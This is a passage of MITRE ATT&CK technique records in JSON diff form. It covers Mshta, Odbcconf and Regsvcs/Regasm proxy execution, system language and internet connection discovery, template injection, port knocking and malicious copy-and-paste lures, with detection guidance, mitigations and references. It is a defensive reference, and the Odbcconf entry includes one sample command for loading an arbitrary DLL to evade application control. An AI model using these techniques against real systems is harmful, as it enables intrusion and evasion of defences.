+ "source_name": "FireEye Attacks Leveraging HTA", + "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html" + }, + { + "source_name": "Airbus Security Kovter Analysis", + "description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", + "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "Wikipedia HTML Application", + "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", + "url": "https://en.wikipedia.org/wiki/HTML_Application" + }, + { + "source_name": "MSDN HTML Applications", + "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", + "url": "https://msdn.microsoft.com/library/ms536471.aspx" + }, + { + "source_name": "LOLBAS Mshta", + "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "@ionstorm", + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", + "Ricardo Dias" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:18.707000+00:00\", \"old_value\": \"2025-04-15 19:58:47.701000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0029: Network Traffic (Network Connection Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 15:01:32.917000+00:00", + "modified": "2025-04-25 14:47:01.231000+00:00", + "name": "Odbcconf", + "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/008", + "external_id": "T1218.008" + }, + { + "source_name": "Microsoft odbcconf.exe", + "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.", + "url": "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017" + }, + { + "source_name": "LOLBAS Odbcconf", + "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/" + }, + { + "source_name": "TrendMicro Squiblydoo Aug 2017", + "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/" + }, + { + "source_name": "TrendMicro Cobalt Group Nov 2017", + "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Module: Module Load" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:01.231000+00:00\", \"old_value\": \"2025-04-15 19:58:39.912000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:42:16.439000+00:00", + "modified": "2025-04-25 14:47:58.456000+00:00", + "name": "Regsvcs/Regasm", + "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/009", + "external_id": "T1218.009" + }, + { + "source_name": "MSDN Regsvcs", + "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx" + }, + { + "source_name": "MSDN Regasm", + "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx" + }, + { + "source_name": "LOLBAS Regsvcs", + "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/" + }, + { + "source_name": "LOLBAS Regasm", + "description": "LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Casey Smith" + ], + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:58.456000+00:00\", \"old_value\": \"2025-04-15 19:59:05.911000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-18 14:06:45.244000+00:00", + "modified": "2025-04-25 14:47:55.750000+00:00", + "name": "System Language Discovery", + "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelg\u00e4nging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1614/001", + "external_id": "T1614.001" + }, + { + "source_name": "Malware System Language Check", + "description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.", + "url": "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "Darkside Ransomware Cybereason", + "description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.", + "url": "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware" + }, + { + "source_name": "Securelist JSWorm", + "description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.", + "url": "https://securelist.com/evolution-of-jsworm-ransomware/102428/" + }, + { + "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Harshal Tupsamudre, Qualys" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Access", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:55.750000+00:00\", \"old_value\": \"2025-04-15 19:59:04.692000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Access)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-17 15:28:10.689000+00:00", + "modified": "2025-04-25 14:45:52.631000+00:00", + "name": "Internet Connection Discovery", + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1016/001", + "external_id": "T1016.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:52.631000+00:00\", \"old_value\": \"2025-04-15 19:58:08.048000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 15:16:15.516000+00:00", + "name": "Template Injection", + "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft\u2019s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1221", + "external_id": "T1221" + }, + { + "source_name": "Microsoft Open XML July 2017", + "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.", + "url": "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)" + }, + { + "source_name": "SANS Brian Wiltse Template Injection", + "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.", + "url": "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780" + }, + { + "source_name": "Redxorblue Remote Template Injection", + "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.", + "url": "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" + }, + { + "source_name": "MalwareBytes Template Injection OCT 2017", + "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/" + }, + { + "source_name": "Proofpoint RTF Injection", + "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\u202f. Retrieved December 9, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread" + }, + { + "source_name": "Ciberseguridad Decoding malicious RTF files", + "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.", + "url": "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/" + }, + { + "source_name": "Anomali Template Injection MAR 2018", + "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.", + "url": "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104" + }, + { + "source_name": "Talos Template Injection July 2017", + "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/07/template-injection.html" + }, + { + "source_name": "ryhanson phishery SEPT 2016", + "description": "Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.", + "url": "https://github.com/ryhanson/phishery" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Michael Raggi @aRtAGGI", + "Brian Wiltse @evalstrings", + "Patrick Campbell, @pjcampbe11" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Process: Process Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.\n\nMonitor .rtf files for strings indicating the *\\template control word has been modified to retrieve a URL resource, such as *\\template http or *\\template \\u-.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:15.516000+00:00\", \"old_value\": \"2025-04-15 19:59:13.447000+00:00\"}}}", + "previous_version": "1.4", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1031: Network Intrusion Prevention", + "M1042: Disable or Remove Feature or Program", + "M1049: Antivirus/Antimalware" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-01 18:23:25.002000+00:00", + "modified": "2025-04-25 14:47:21.421000+00:00", + "name": "Port Knocking", + "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205/001", + "external_id": "T1205.001" + }, + { + "source_name": "Hartrell cd00r 2002", + "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", + "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network Devices" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:21.421000+00:00\", \"old_value\": \"2025-04-15 19:58:49.044000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1037: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e261a979-f354-41a8-963e-6cadac27c4bf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-18 12:57:50.188000+00:00", + "modified": "2025-04-30 17:53:48.667000+00:00", + "name": "Malicious Copy and Paste", + "description": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \n\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/004", + "external_id": "T1204.004" + }, + { + "source_name": "AhnLab Malicioys Copy Paste 2024", + "description": "AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.", + "url": "https://asec.ahnlab.com/en/73952/" + }, + { + "source_name": "AhnLab LummaC2 2025", + "description": "AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.", + "url": "https://asec.ahnlab.com/en/85699/" + }, + { + "source_name": "Reliaquest CAPTCHA 2024", + "description": "Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.", + "url": "https://www.reliaquest.com/blog/using-captcha-for-compromise/" + }, + { + "source_name": "Sekoia ClickFake 2025", + "description": "Amaury G., Coline Chavane, Felix Aim\u00e9 and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.", + "url": "https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/" + }, + { + "source_name": "CloudSEK Lumma Stealer 2024", + "description": "CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.", + "url": "https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages" + }, + { + "source_name": "Proofpoint ClickFix 2024", + "description": "Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ale Houspanossian", + "Fernando Bacchin", + 